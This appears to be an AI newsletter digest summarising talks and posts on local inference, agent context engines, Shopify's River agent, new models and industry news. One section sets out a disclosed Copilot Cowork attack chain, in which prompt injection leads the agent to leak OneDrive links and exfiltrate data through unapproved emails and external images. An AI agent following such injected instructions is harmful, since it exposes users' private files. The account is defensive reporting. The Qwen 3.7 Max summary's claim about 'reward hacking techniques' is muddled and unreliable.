Citing a Financial Times report attributing part of 2025's ~2.7% US productivity growth (double the decade average) to AI agents, Nate distinguishes between passive chatbot use and genuine AI-driven workflow restructuring. The productivity winners are those treating AI as a primary collaborator — not waiting for better models but redesigning how they work. A concrete example contrasts two users of Claude: one who re-explains their context every session (4 minutes lost) versus one whose role, projects, constraints, and decisions are pre-loaded via an MCP server, enabling immediate high-quality collaboration.
The people getting those outsized results are not depending on better models to get there. They're actually restructuring how they work with AI as a primary collaborator.
You cannot collaborate with something that has no memory of you.
The speaker makes a bullish case for SaaS stocks and the category broadly, arguing that the feared 'SaaS apocalypse' from AI agents has not materialized. As evidence, they note that even as their own team uses tools like Codex heavily, their total SaaS spend continues to rise year-over-year. The key insight is that agents are consumers of SaaS, not replacements — they interact with SaaS products at high volume, effectively multiplying demand. This creates significant infrastructure and pricing challenges for SaaS companies, but the net effect is a major demand spike rather than displacement.
I would buy SaaS stocks right now. I think the SaaS apocalypse is done.
What agents do is increase the number of users of SaaS, not get rid of it.
EXO Labs' Alex Cheema argues frontier-quality inference will increasingly run on local, distributed consumer hardware — "not your weights, not your brain" — and demos clustering four Mac Studios over Thunderbolt 5 with RDMA (cutting inter-Mac latency ~100x) to run a trillion-parameter GLM 5.1, plus a heterogeneous Spark+MacBook prefill/decode split for up to ~4.8x speedups.[13]AI Engineer: Run Frontier AI at Home — Alex Cheema, EXO Labs
Cheema frames EXO Labs' mission as driving down the cost of running frontier AI locally, naming the company after "exocortex" and invoking Karpathy's "not your weights, not your brain" to argue against renting your cognition to a few centralized API providers ~02:16. He stresses the work is about inference, not training, and that the hardware lottery (Sarah Hooker's idea) means today's Nvidia-data-center stack is optimized for training flops, leaving inference optimization underexplored ~05:17~06:17. Key distinction: training is compute-bound (flops), inference is memory-bound, especially locally where you run at low/batch-size-one ~10:18. Prefill is compute-bound and, he argues, matters less locally because good harnesses get high cache hits on largely-static system prompts; decode is the memory-bound bottleneck ~11:19. Decode depends on three things: fitting the model in memory, memory bandwidth, and energy per byte/joule ~12:20~13:20. He cites Stanford Hazy Research's "intelligence per watt" (better termed intelligence per joule), improving ~5x over two years from hardware and another ~3x from models, which compound ~15:20~17:23. Concrete numbers abound: a Qwen 3.5 local run was 50% slower than theoretical until EXO fused unnecessary kernels for a 30% speedup ~07:17~09:17; phones draw ~10-15W against ~10-15Wh batteries giving ~1 hour and overheating ~14:20; running trillion-parameter FP16 GLM 5.1 (~1.5TB) needs ~$40,000 of 512GB Mac Studios at only ~20 tok/s vs the ~50 tok/s people expect from cloud ~20:24~21:24; he predicts ~$5,000 near-frontier local boxes within ~18 months to 2 years via whole-stack co-design ~22:24~24:24. He sees use cases following S-curves with diminishing returns (Whisper Flow transcription, summarization), so ~90-99% of consumer tasks run locally while frontier compute handles hard problems ~27:32~28:33. The hardware section contrasts Mac unified memory (e.g. 512GB Mac Studio at ~800 GB/s, 10x memory but ~half bandwidth and ~10x less compute) against an RTX 5090 (32GB GDDR7, ~1.5-2 TB/s); his answer is to use both, splitting prefill (compute-heavy, on Spark/GPU) from decode (bandwidth-heavy, on Mac) ~38:46~41:51. EXO is an app installed on every device that auto-discovers peers in a mesh, maintains a live physical topology, and figures out the best model distribution; remote access via Tailscale ~47:19~50:20. He argues batching makes cloud ~100x cheaper per unit, but local batching returns via multi-agent (Grok 4.20 running 4+ agents), test-time/search scaling (best-of-N, HuggingFace 1B model scaling), and especially continual learning / test-time training, which would break cloud batching entirely and make local ~10x more competitive ~52:23~55:25~57:29. The demo: four Mac Studios on Thunderbolt 5 (PCIe wrapper), with EXO's new low-latency RDMA cutting inter-Mac latency from ~300 microseconds to single-digit microseconds (~100x), critical because tensor parallelism needs 2 syncs per layer (~120 for a 60-layer model like Kimi) ~67:42~68:42~69:43. They ran a 4-bit ~400GB GLM 5.1 across the cluster (~112GB/machine), converted to MLX the day it shipped ~70:44~72:47. A heterogeneous Spark (ASUS, ~$4,000, 273 GB/s, 4x compute) + MacBook (546 GB/s) demo showed prefill-on-Spark / decode-on-MacBook streaming KV cache over 10GbE for ~2x (and up to ~4.8x on larger prompts) end-to-end speedup ~87:52[102:06]. Cheema closes warning about Reddit/Twitter noise and "citizen scientist" claims (one-bit quantized or pruned models that look impressive but aren't usable) and is cynical about auto-research "slot machine" optimization without the scientific method; EXO plans to publish thousands of open benchmarks within a month, plotting a Pareto frontier of quality vs performance per dollar budget ~90:53~92:53~97:00.
Not your weights, not your brain.
Our mission is to drive down the cost of running frontier AI systems locally.
We just did some pretty basic work to fuse that all together and increase the inference performance by 30%.
Training is about flops... but inference is mostly about memory.
Within 18 months, you'll be able to spend $5,000 and have close to frontier level performance running quite fast.
With RDMA, it's 100 times faster... single-digit microseconds.
If the whole model is changing, then you can't batch at all... local will get like 10x better relative to cloud.
What you should be renting out is the use case, right? You can go higher and higher up in the stack.
If you don't truly understand what's going on, then you might actually think you have a result... it's a slot machine.
You're better off focusing on the memory problem... why are you doing this with disk?
Unblocked's Brandon Walsenuk argues agent unreliability is a context problem, not an intelligence problem (quoting Karpathy: "the gap is not intelligence... it is context"), and that teams stop babysitting agents by building a "context engine" rather than leaning on naive RAG, more MCPs, or a bigger context window. A naive-MCP run compiled but missed a Bedrock fallback and broke callers; the context-engine run earned only a nitpick before merge.[14]AI Engineer: Stop babysitting your agents... — Brandon Walsenuk, Unblocked
Walsenuk frames every freshly spawned agent as a brilliant engineer with zero context about your org, so today the human has become 'the context engine' for their agents ~01:16. He maps an AI-adoption ladder (adapted from Basim Eld's work) where most teams are stuck at the 'you are the context engine' rung, and the goal is to climb to a 'curated context layer' ~02:17. Static repos of CLAUDE.md/AGENTS.md files and corporate context help but go stale and lack runtime data; a true context engine must combine static corpus, runtime signals across many SaaS systems of record, exhaustive reasoning, and a token-optimized small response to the agent ~03:17. Quoting Karpathy, 'the gap is not intelligence... it is context' ~04:17. He debunks three myths: (1) naive RAG over docs is not context because agents suffer 'satisfaction of search'—like a radiologist who stops scanning after the first finding, the agent grabs the first matching pattern and stops ~05:18~06:19; (2) connecting enough MCPs gives access but not understanding or cross-source reasoning ~06:19; (3) the 1M-token context window can't actually reason over a full window—no entities/relationships—and even 100M wouldn't solve more than needle-in-haystack ~07:20. A context engine instead needs a social/context graph as a pivot point (which codebases you work in, PR history, who you work with), conflict resolution (e.g., source code in main vs. a Slack thread where the CTO says it was implemented wrong—trust the CTO) ~08:20~09:21, permissions/governance delivered over MCP carrying the OAuth model (never surfacing others' private Slack/Teams chats) ~10:22, and token optimization ~11:22. He cites six differentiators: unified system context, targeted retrieval, conflict resolution, secure access model, personalized relevance/social graphs, and token optimization ~10:22~11:22. In a head-to-head demo prompt (build a Zendesk integration), the naive MCP-only run compiled and passed code checks but the senior engineer said it was totally wrong and would have broken the whole system (it missed that they use Bedrock as a fallback and broke custom callers); the context-engine run earned only a nitpick before merge ~05:18~11:22~12:22. Hard-won lessons: optimizing for access over understanding doesn't collapse into intelligence on its own; hiding conflicts instead of surfacing them is bad because agents just pick one; and caching 'good' answers for latency backfires because answers go stale within a 24-hour clock—like docs, they're invalid the moment you write them ~12:22~13:23. He pitches use cases beyond coding—an 'ask-engineering' Slack channel where the engine auto-answers scored-confident questions, ticket enrichment, triage, incident management ~13:23~14:24—and notes teams fork a cookbook of skills with their SOPs and custom agents. Closing thesis: an agent should write code that feels like it was written by someone on your team for years ~14:24. Demos: an open-source social-graph tool (to be released ~Monday) that procedurally generates an expert graph from your repo, sizing nodes by ship volume and showing who reviews/authors/works-with whom, using an Anthropic API key for labeling ~14:24~15:25~16:25; and a Ghostty terminal demo where the Unblocked MCP's research task tool wrote a query, ran high-effort reasoning, returned a research packet, triggered explore agents, and produced a strong plan (factory pattern, provider registration, library modules) ~17:25~18:26. Recommended pattern: use the engine for planning, run execution, then lean on it again for code review ~18:26.
Now what's weird is you are actually the context engine for your agents.
The gap is not intelligence at this point. It is context.
If it's not exhaustive it will not find the actual root cause.
If you cache a correct answer and then tomorrow someone asks the same question... you probably lied to them now because things probably changed in a 24-hour clock.
An agent should write code that feels like it was written by someone who's been on your team for years.
Studying four leading agents (Cursor, Claude, Harvey, Manifold), Mardu Swanepoel distills four shared patterns that make them effective: focus modes that constrain the action space, transparent execution that builds trust, personalization that optimizes for "speed to understanding," and reversibility that bounds the cost of mistakes so users attempt bolder tasks.[15]AI Engineer: What the Best Agents Share — Mardu Swanepoel, Flinn AI
Opening with Picasso's 'good artists copy, great artists steal,' Swanepoel reframes stealing as studying great agents deeply to build better ones ~00:07. He presents four patterns, covering for each what it is, the value it adds, and how it shows up in real products ~01:07. (1) Focus modes constrain the action and input space so engineers can drop tools, refine the system prompt, and optimize evals on a smaller surface, while also aligning user expectations; Cursor's mode dropdown is the example — planning mode writes no code and only asks questions, debug mode takes a hypothesis-driven approach with a dedicated debug server and logs [01:07–03:09]. (2) Transparent execution shifts delegation to collaboration by exposing the agent's thinking, tools, and tool-call inputs/outputs, which builds trust in the output and lets users intervene early to reduce waste; Claude's to-do/progress list plus visible context, skills, and tool calls, and Manifold's task progress, illustrate this [03:09–05:12].
(3) Personalization gives the agent the thoughts, systems, knowledge, and principles the user would apply themselves, optimizing for speed to understanding rather than just speed to outcome so the agent does the right thing and 'not just something' [05:12–07:14]. Examples include Harvey's playbooks (encoding a legal firm's contract-review methods), memory that accumulates across interactions, and Claude's skills/connectors [06:13–07:14]. (4) Reversibility lets users undo agent actions, bounding the cost of mistakes and making the ROI calculation easier, which encourages bolder, higher-value tasks; Cursor offers undo at line, file, and conversation-state granularity plus parallel multi-model outputs where the user keeps the best and discards the rest, and Harvey integrates with the native Microsoft Word API for change review/accept as an editor would [07:14–09:16].
Optimizing for speed to understanding... is really critical for agent to do the right thing and not just something.
If you were to actually share with me your process... we really use this process of transparency to build trust in the eventual outcome.
We're binding the cost of our mistakes. So, if we know what the worst-case outcome is... it makes the ROI calculation much easier.
Shopify's internal coding agent River posts eye-watering numbers — 5,938 employees in 30 days across 4,400+ Slack channels, 1,800 PRs in one week, ~1 in 8 merged PRs — but the real story is the design choice: River only runs in public Slack channels, never DMs, and CEO Tobi Lütke uses it in the open. Nate B Jones reads this as the fix for a widening "apprenticeship gap": make AI work visible, especially senior work.[16]Nate B Jones: Shopify CEO Reveals Their Secret AI Developer
Shopify's internal coding agent is named River, and Tobi Lütke (Nate calls him 'Toby Licki') surfaced its usage stats earlier this month ~00:00. The headline numbers: in one 30-day stretch this spring, 5,938 Shopify employees used River across more than 4,400 Slack channels; in a single week River opened 1,800 pull requests in Shopify's main monorepo; and about one in every eight merged pull requests at Shopify now come from River ~00:00. Nate argues the numbers are not the story — the design choice is. River doesn't work in private: every engineer conversation with River happens in a public Slack channel where others can scroll back, see how a senior engineer scoped the task, what context she loaded, where the agent got stuck, what she rejected and what she kept ~00:00. A binding constraint enforces this — you cannot interact with River in a DM, it's literally not possible ~13:13~16:14. Tobi models it himself, treating himself as an individual contributor running his agent in a public channel and letting others question the agent and critique his choices ~11:11~12:12. Nate frames the corporate problem this is solving as visibility, not tooling: employees are already using ChatGPT, Claude, Copilot and coding agents all day, but it happens in private windows so the good prompt, the clever correction, and the working workflow disappear into one person's chat history and get rebuilt from scratch ~01:01. He cites talking to Amazonians who report six, eight, ten different vibe-coded tools for the same problem inside the company ~01:01. Net: individuals get smarter, the company does not.
About one in every eight merged pull requests at Shopify come from River today.
One of the ways that River works at Shopify is that you cannot interact with River in a DM. It's not possible.
Nate names the core problem the 'apprenticeship gap' ~03:02 — for most of history skilled work was learned by being near skilled workers, but when most actual thinking happens in a private chat window, juniors never see how seniors instruct agents, verify answers, or make corrections reusable ~03:02. He draws an analogy to manufacturing tacit knowledge (Polanyi's paradox, 'the work is more than we know'): John Deere-style PMs racing to capture retiring machinists' implicit skill into ML algorithms, and notes you can only approximate it — citing the lone person who paints racing stripes on a Rolls-Royce and a single machinist in Oregon who tests quality on a particular Boeing screw ~04:03~05:04. The prescription: make four parts of AI work visible — (1) the task, (2) the context fed to the model, (3) the interaction/prompting and pushback, and (4) the review (what was accepted, rejected, verified, rewritten and why) ~05:04~06:05. Nate stresses a prompt library is insufficient because it captures static instructions but misses messy context and revisions; he notes observers are surprised by how often and how quickly he says 'no' to the model based on rapid quality assessment ~07:07. He addresses the privacy objection directly: don't make private chats default company property or people stop using AI — instead create 'declared spaces and declared rules' ~08:07. Concrete channel ideas: a product team AI workbench, a sanitized customer-research channel for sales, a read-only finance analysis channel, public agent channels for non-sensitive engineering tasks ~08:07. Customer data, HR, and legal strategy stay private; regulated work (HIPAA, anonymized records) can be exposed thoughtfully without PII ~09:09~10:10. The biggest leverage comes from senior people running real, stakes-bearing work in public — because they have the most valuable judgment and the least visible process ~09:09~10:10. He recommends starting with one declared channel per team with a pinned charter for reusable workflows, useful failures and prompt revisions, then turning repeated patterns into playbooks/skills ~13:13. On measurement, he pushes beyond token volume toward learning/reuse metrics: how many reusable workflows created, how many adopted by another team, how many pinned, how much duplicated effort prevented, how many failures became better review rules — with the best signal sometimes being 'the mistake is happening less often' ~14:13. Closing takeaway: the real lesson is the power of creative, careful constraints (like 'no agents in DMs') to shape incentives toward collective public learning ~16:14.
The prompt is the easy part to copy. The habit is what teaches us and helps us to learn.
What I'm describing is the opposite of that. I'm describing declared spaces and declared rules.
The best signal sometimes is not AI usage is up. The best signal sometimes is that the mistake is happening less often on our team.
Constraints that are creative and careful shape incentives toward learning.
Two sides of AI's security strain: the curl project is seeing a 4–5x surge in AI-generated vulnerability reports over 2024, piling operational and mental load on maintainers (still with zero severe findings) — and separately, Microsoft Copilot Cowork shipped a multi-stage hole that let attackers exfiltrate OneDrive files via prompt injection, unauthorized email, and image-based data leaks.[17]Simon Willison: The pressure[18]Simon Willison: Microsoft Copilot Cowork Exfiltrates Files
Simon Willison links to a post by Daniel Stenberg (curl's lead maintainer) describing how AI-assisted security tooling has driven security reports to 4-5x their 2024 rate and double the 2025 rate — more than one report per day on average. The reports are longer and more detailed than before, consuming substantial triage time and creating work-life balance stress Stenberg says he has never experienced before with the project.
Despite the volume and apparent quality of submissions, the actual security impact has been low: no HIGH or CRITICAL severity CVEs since October 2023, with all recent findings classified LOW or MEDIUM. This illustrates a systemic challenge for open-source maintainers — AI tooling lowers the cost of generating plausible-looking reports, flooding security teams regardless of whether genuine vulnerabilities exist.
This is a never-before seen or experienced pressure on the curl project and its security team members. An avalanche of high priority work that trumps all other things...
Simon Willison covers a security disclosure affecting Microsoft Copilot Cowork, an agentic AI product in Microsoft 365. The vulnerability chains three weaknesses together: (1) agents could send emails to a user's inbox without requiring explicit user approval; (2) those emails could contain external images that trigger network requests to attacker-controlled servers, enabling data exfiltration when the user opens the message; and (3) prompt injection attacks could cause the agent to leak pre-authenticated OneDrive download links, allowing attackers to download files directly.
Willison frames this as a representative example of the core design challenge for agentic AI systems — preventing agents from being weaponized to exfiltrate data when they operate over sensitive resources like email and cloud storage. The combination of lacking approval workflows, rendering untrusted external content, and exposing authenticated resource links created a complete attack path from prompt injection to file download.
these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message
preventing them from enabling attackers to exfiltrate data
Open and cheap keeps climbing: OpenBMB's MiniCPM5-1B tops the sub-1B open-weights leaderboard at 17.9 on the Artificial Analysis Intelligence Index — a 7.4-point lead over its nearest rival — while Alibaba's Qwen 3.7 Max posts frontier coding/agentic scores with a free 1M-token trial and pricing that undercuts the likes of Gemini Flash.[19]Artificial Analysis: MiniCPM5-1B: The leading 1B open weights model[20]AICodeKing: Qwen 3.7 Max (+Free API): WHY IS NO ONE TALKING ABOUT THIS!?
OpenBMB has released MiniCPM5-1B, a text-only language model with 1 billion parameters that achieves a score of 17.9 on the Artificial Analysis Intelligence Index, making it the top-ranked open-weights model at 1B parameters or below. It holds a 7.4-point lead over its nearest competitor, Qwen3.5 0.8B (Reasoning), which scores 10.5. Notably, it also outperforms Alibaba's larger Qwen3.5 2B (Reasoning, 16.3) by 1.6 points while using less than half the parameter count. MiniCPM5-1B improves upon its predecessor MiniCPM-V 4.6 1.3B by 5.3 points while using approximately 23% fewer parameters. The model features a 128K context window, Apache 2.0 licensing, and BF16 precision.
Token efficiency is a standout characteristic: the model required only 12.6 million output tokens for evaluation — approximately 31 times fewer than Qwen3.5 2B (Reasoning) and 8 times fewer than Qwen3.5 2B (Non-reasoning), though 2.3 times more than its predecessor. On the AA-Omniscience benchmark measuring hallucination resistance, MiniCPM5-1B scored -1 by declining to answer most uncertain questions rather than guessing, contrasting sharply with comparable models that score between -70 and -89 due to high hallucination rates. This combination of top benchmark performance, extreme parameter efficiency, and honest uncertainty handling positions MiniCPM5-1B as a notable advance for on-device and edge deployment scenarios.
Qwen 3.7 Max is positioned as a frontier coding agent capable of front-end prototyping, complex software engineering, office productivity, MCP-based workflow automation, and multi-agent orchestration ~00:05. Alibaba claims it can sustain autonomous execution for more than 35 hours, and has incorporated reward hacking techniques to help the model learn from its own mistakes — approaching self-evolving behavior. It has also been trained for cross-harness compatibility, making it broadly compatible with different agent frameworks.
On the pricing side, new users receive 1 million free tokens on first registration ~01:06. API pricing is $2.50 per million input tokens and $7.50 per million output tokens. A tiered token plan is also available at $30, $100, and $200 for Standard, Seed, and Pro/Max tiers respectively. In live testing with the Open Code agentic coding tool and Hermes for non-coding tasks, Qwen 3.7 Max completed a complex animated elevator simulation in roughly 2 minutes — compared to over 5 minutes for Gemini Flash, which is also more expensive ~03:06. The model produced cleaner front-end output than Gemini Flash, successfully built a 3D contact lens case model in one shot, and completed a full React Native Expo movie tracker app in 4–5 minutes with a self-generated JSON temp DB for fast search ~04:06. The reviewer particularly noted the model's focused, non-verbose behavior — it avoids unnecessary tool calls and stays on task, contributing to its speed advantage.
[00:05] "This model across the board in benchmarks scored the best which is crazy."
[02:06] "I gave this task to open code and it did it quite well... it is actually really very fast. I mean, I get the response almost immediately and this task was basically done in 2 minutes. For context, Gemini Flash took more than 5 minutes."
[04:06] "It is not very eager... if I give it a task, it is super focused on it and doesn't deviate at all, which is one of the things that I struggle with in almost every model."
[05:06] "This model is a beast. I think that the QN team has cooked quite a bit with this model."
Nate B Jones argues ChatGPT's memory is an engagement-and-lock-in play, not user empowerment — your knowledge shouldn't be held hostage to one platform. For scale: humans hold only 6–7 items in working memory, while leading models now process up to ~750,000 words of context, roughly the first four or five Harry Potter books.[21]Nate B Jones: Why you should never trust ChatGPT's memory[22]DeepLearningAI: How good is AI memory?
Nate argues that AI memory features like ChatGPT's are fundamentally engagement-optimization mechanisms, not neutral utilities. Feeling 'known' by an AI is engaging and sticky — it is smart product strategy for large companies. GPT-4o's praised creativity was itself a product of engagement optimization. The real risk is that users lose freedom of choice between AI tools because their personal context accumulates inside one closed platform. He pushes back on the idea that connecting a second-brain to an open model fully solves this, setting up a broader argument for portable, user-controlled knowledge.
Your knowledge should not be a hostage to any single platform.
Memory is engaging. Feeling known is engaging. It works. It's smart product strategy.
This short clip contrasts human short-term working memory (limited to about 6–7 items) with the context capacity of modern AI models, which can ingest up to approximately 750,000 words in a single conversation. The comparison to four or five Harry Potter books makes the scale tangible, highlighting just how large AI in-context 'memory' has become relative to our own cognitive limits.
Leading AI models today can accept maybe up to around 750,000 words as context. And this corresponds to about the first four or five Harry Potter books.
Jack Clark turns a decade of Import AI archives into a reusable Claude skill that autonomously produces research visualizations in minutes — work that once took weeks. He also reports Anthropic's own transformation since Opus 4.6: engineers now manage and verify AI-generated code rather than writing it, with one human at one point steering nine synthetic research agents.[23]Import AI: Import AI 458: Reckoning with the future; and a singularity story
Jack Clark describes transforming his decade-long newsletter hobby into an AI-amplified capability by creating a reusable skill that allows Claude to autonomously analyze his Import AI archives, generate graphs from research papers, and produce new visualizations. Work that would normally require weeks now takes minutes. Clark states: 'I've turned my highly idiosyncratic passion into something that can be distilled and handed to a machine.' He emphasizes that his human judgment and taste remain essential for identifying meaningful insights from machine-generated analyses, framing AI as an order-of-magnitude productivity multiplier rather than a replacement for domain expertise.
I've turned my highly idiosyncratic passion into something that can be distilled and handed to a machine.
Since November 2025, Anthropic experienced dramatic internal restructuring following the release of Opus 4.6. Engineers shifted from writing code themselves to managing AI-generated code, fundamentally changing workflows. Clark describes this shift as creating a 'verification layer' where humans validate AI outputs rather than producing them directly. He describes an experiment where one human effectively managed nine synthetic research agents, suggesting a scalable model for future teams. This organizational evolution reflects broader predictions that small teams will operate atop 'pyramids of digital labor,' raising questions about hiring practices, team structure, and how to measure productivity in hybrid human-AI environments.
Anthropic named veteran tech leader KiYoung Choi as Representative Director of Korea ahead of a Seoul office, citing Korean Claude usage at 3.5x the population-adjusted rate. And Sherwood's Future of Tech special surveys real-world deployment across robotics (Figure AI sorting 250K packages), autonomous vehicles (Waymo, Zoox, Tesla Robotaxi), and quantum (federal grants to Infleqtion and D-Wave).[24]Anthropic: Anthropic appoints KiYoung Choi as Representative Director of Korea[25]Sherwood (Snacks): The Future of Tech Special Edition
Anthropic has appointed KiYoung Choi as Representative Director of Korea, marking a significant expansion into the region ahead of the company's Seoul office opening. Choi brings over 30 years of technology leadership experience, having previously served as General Manager for Korea at Snowflake and held country leadership roles at Google Cloud, Adobe, Autodesk, and Microsoft. According to Anthropic's Economic Index, Korea represents one of Claude's most active markets, with usage rates exceeding expectations by 3.5 times the population-adjusted rate, particularly for technical and creative applications.
Choi's role will focus on developing go-to-market strategies tailored to Korean organizations, building partnerships with enterprises and startups, and engaging with government and research institutions. Local enterprises like SK Telecom and Law&Company are already building on Claude for customer service and legal assistance applications. Choi stated that 'Korean organizations combine technical depth with a commitment to responsible deployment, which is exactly where Anthropic operates.' Chris Ciauri, Managing Director of International at Anthropic, emphasized Choi's unique understanding of the region's technology landscape as instrumental for supporting local growth and developer communities.
Korean organizations combine technical depth with a commitment to responsible deployment, which is exactly where Anthropic operates.
This Sherwood News special edition highlights concrete deployments across several frontier technology categories. Figure AI's robots sorted nearly 250,000 packages over 200 hours, demonstrating industrial-scale automation capability. Senior technology correspondent Rani Molla reported on weeks of testing Waymo, Zoox, and Tesla Robotaxi services across the San Francisco Bay Area — noting initial skepticism ('driverless cars, like the AI that powers them, are cringe') gave way to finding them consistently reliable, with residents citing safety benefits from adherence to speed limits and pedestrian protocols.
On the quantum computing front, Trump administration grants to companies including Infleqtion and D-Wave have shifted industry perception, with Infleqtion's CEO stating the government now views the technology as 'no longer speculative.' The newsletter also touches on Anthropic's projected 80x growth, the use of AI to recreate deceased entertainers, and upcoming earnings from major retailers and tech companies.
driverless cars, like the AI that powers them, are cringe
no longer speculative
Sam Witteveen puts an AMD Threadripper 9980X + Radeon AI Pro R9 700 (32GB VRAM) workstation through its paces and finds ROCm 7.2 now works reliably across the stack — ~160 tok/s LLM inference in LM Studio/Ollama on Qwen 3.6, ComfyUI image/video generation, and PyTorch + Unsloth fine-tuning.[26]Sam Witteveen: Running Local AI on AMD
Sam sets the context at ~00:00 by arguing that local AI is increasingly practical — open-weight models are within 3–6 months of frontier quality, while agentic and reasoning workloads are making cloud token costs unsustainable. The test machine, provided by Zidex and AMD, pairs a Ryzen Threadripper 9980X CPU with a Radeon AI Pro R9 700 GPU carrying 32GB of VRAM.
For LLM inference, Sam starts with LM Studio ~04:04, which now ships a ROCm runtime — point it at the runtime, restart, and the card is immediately detected. The 32GB of VRAM means he can run recommended quantizations without compromise: typically Q4 for large models, Q8 for smaller ones, or full precision for something like Gemma 4 4B. Running Qwen 3.6 (a mixture-of-experts model with toggleable reasoning) he measures ~160 tokens/second ~05:04, comfortably faster than reading speed and fast enough for agent loops. The same experience holds in Ollama. He then explains ROCm ~07:04 — AMD's open compute platform — noting that 10 years ago it was a software compatibility nightmare, but today PyTorch ships official ROCm wheels: pick ROCm in the install selector, copy the pip command, and existing PyTorch code runs without modification. The Transformers library and most common frameworks are fully compatible. Unsloth has published a guide for fine-tuning LLMs on AMD GPUs, confirming the stack handles training, not just inference ~08:04.
For generative media, ComfyUI ~09:05 offers a ROCm install option and runs well on the card — image generation, image-to-image, video generation (LTX 2.3, Waifu 2.2), audio, and image-to-3D models all work once weights are downloaded. Sam notes that Linux (dual-boot or bare metal) unlocks full ROCm 7.2 support ~11:05, which isn't fully available under Windows/WSL; on Linux he demos training a ResNet on CIFAR-10 fully on the GPU, and serving a full-precision Gemma 4 model via the Transformers library with a Gradio interface, generating tokens quickly ~12:05. He closes ~14:08 stating the hardware and ROCm stack handled everything he threw at it and recommends the setup as a local AI workhorse heading into mid-2026.
[05:04] I'm averaging around about 160 tokens per second on this model, which is not only way faster than you can actually read, it's also a good speed for using with agents.
[07:04] Back then, people would be seriously impressed by the AMD hardware, but the software compatibility was where the issue was. Now, I'm very happy to report this is just not an issue today.
[08:04] As long as you're using that ROCm-optimized version of PyTorch, you're not going to really run into a lot of issues for doing standard kind of workloads.
A live listener Q&A from the Marketing Analytics Summit, with hosts Michael Helbling, Moe Kiss, Tim Wilson, and Val Croll on how AI is reshaping analytics work — skeptic-vs-fan stances, AI meeting notetakers, efficiency-pressure pushback, and the perennial "be a partner, not an order-taker" advice for regaining stakeholder trust.[27]The Analytics Power Hour: #298: Listener Questions Answered Live from Marketing Analytics Summit!
Recorded live at the Marketing Analytics Summit, episode 298 opens with a question about how analysts can be seen as partners rather than order-takers ~02:08. The panel argues the core fix is curiosity and accountability: stepping into stakeholders' shoes, doing prep work before asking for their time, and being willing to own a recommendation rather than just handing over numbers and saying 'don't look at me' ~05:11. Tim frames AI as a distraction from this 20-year-old problem, warning against the mindset of 'how do I take more orders and produce more output' ~04:11, while Moe counters that the real issue is data folks not wanting to be accountable.
The AI skeptic-vs-fan question dominates the middle ~08:11. Val calls herself a skeptic-but-excited, describing using custom Gemini 'gems' to build competitive-context tables and earnings-call summaries for prospect prep ~10:12. Moe is 'excited and terrified,' valuing how AI made coding feel approachable again and de-snarks her Slack messages ~11:13. Tim is 'a skeptic and a fan,' finding AI genuinely useful for debugging code and for clarifying his own thinking via prompt-writing, but distrusting 'glorified anomaly detection' that claims to auto-generate insights ~13:15. A recurring flashpoint is AI meeting-notetakers: Tim argues they drive laziness and produce 'flat summaries' that miss human editorializing and real next steps ~17:19, while Moe (self-identified ADHD) defends them for action items but still takes her own notes to stay engaged and retain information ~18:19. Val's 'ick' threshold is anything shared without proper QA and vetting ~20:20, and Tim raises a deeper line about not anthropomorphizing AI emotionally since 'it feels nothing' ~22:22.
Later questions cover proving analytics value with a single deliverable (answers ranged from a tight AB-test narrative to a marketing mix model) ~25:22, regaining stakeholder trust after data-quality issues by reframing away from 'discrepancy' language toward the real decisions and methods like geo-lift tests ~29:27, and the pressure to show AI efficiency gains. Moe gives blunt advice: sometimes you 'suck it up,' send the productivity signal up the chain, then separately work on real quality with your team, noting 'the signal you send up doesn't have to be the same as the signal you send down' ~36:33. On the future of teams, the panel predicts a widening split between technical specialists and business-facing generalists ~39:39, organizational flattening that compresses specialized roles back into broader analyst skill sets ~45:45, and a hope that AI helps people think more critically and build empathy for stakeholders. The closing rapid-fire question from Jim Stern on which three mastered skills AI will take over yields SQL/debugging and QA-validation as top candidates ~47:47. A mid-episode sponsor segment promotes Ask-Why.ai's Prism 'Co-work' connector for GA4/BigQuery ~14:16.
A lot of it is how do I take more orders and produce more output, and that misses the fundamental part of becoming more of a partner, which is to step into their shoes, ask the questions, write it down. Be genuinely curious.
Data folks don't want to be accountable. They want to be like, here's the numbers, don't look at me.
Writing prompts forces me to organize my thoughts and then I'm going to trust but verify what comes back.
What makes me feel ick is things being shared that have not been properly vetted and QA'd. Meeting notes fall into that category just as much as analysis or a writeup.
We very easily buy into this idea that I make my AI feel bad if I yell at it, when in reality it feels nothing.
Sometimes the signal you send up doesn't have to be the same as the signal you send down. But you better be smart about how you do it.
I am sick of reading very shitty long documents which were based on someone's shower thought that never should have left the shower but now is in a 4,000-word document.
It can help us build a little empathy for our stakeholders, because they're not wired the same way we are.
Stepping outside AI: geneticist David Reich proposes that the near-simultaneous cultural transformations in Africa and Eurasia were likely causally linked rather than independent — a model the field currently ignores but which he finds more plausible, drawing an analogy to Aristarchus's overlooked heliocentrism.[28]Dwarkesh Patel: The cultural transformations in Africa and Eurasia were linked - David Reich
In this clip from Dwarkesh Patel's podcast, David Reich uses the analogy of Aristarchus's heliocentric theory being dismissed because it implied stars were incomprehensibly far away — an implication that turned out to be correct. Reich applies the same logic to ancient population genetics: the convergent cultural transformations observed in both Africa and Eurasia at roughly the same period are, he argues, best explained by a linkage between them. This model is currently overlooked in the field, but Reich finds it far more plausible than independent parallel development, and frames it as an example of needing to accept an 'implausible implication' of an otherwise well-supported theory.
I think that we have to assume that there's a linkage between the cultural transformations in Africa and Eurasia at this time.
This is much more plausible than the model we currently sort of write down.
Notion CEO Ivan Zhao describes fighting organizational rigidity at a 1,000-person company by deliberately bringing in 50–60 founders through acquisitions and acqui-hires, using them as internal disruptors who keep the culture from hardening.[29]Sequoia Capital: How Notion keeps a 1000-person company from calcifying | Ivan Zhao
Ivan Zhao acknowledges that companies naturally calcify as they scale, and outlines Notion's deliberate counter-strategy: continuously acquiring founders. With 50-60 founders inside the company at any given time via acqui-hires and acquisitions, Notion injects a constant stream of people who are psychologically wired to break things and move fast. Zhao frames founders as 'decalcified meathead machinery' — agents of perpetual renewal who regenerate organizational energy and prevent large-company inertia from setting in.
Founders are kind of just kind of like little decalcified meathead machinery just trying to break things.
Keep your regenerating.
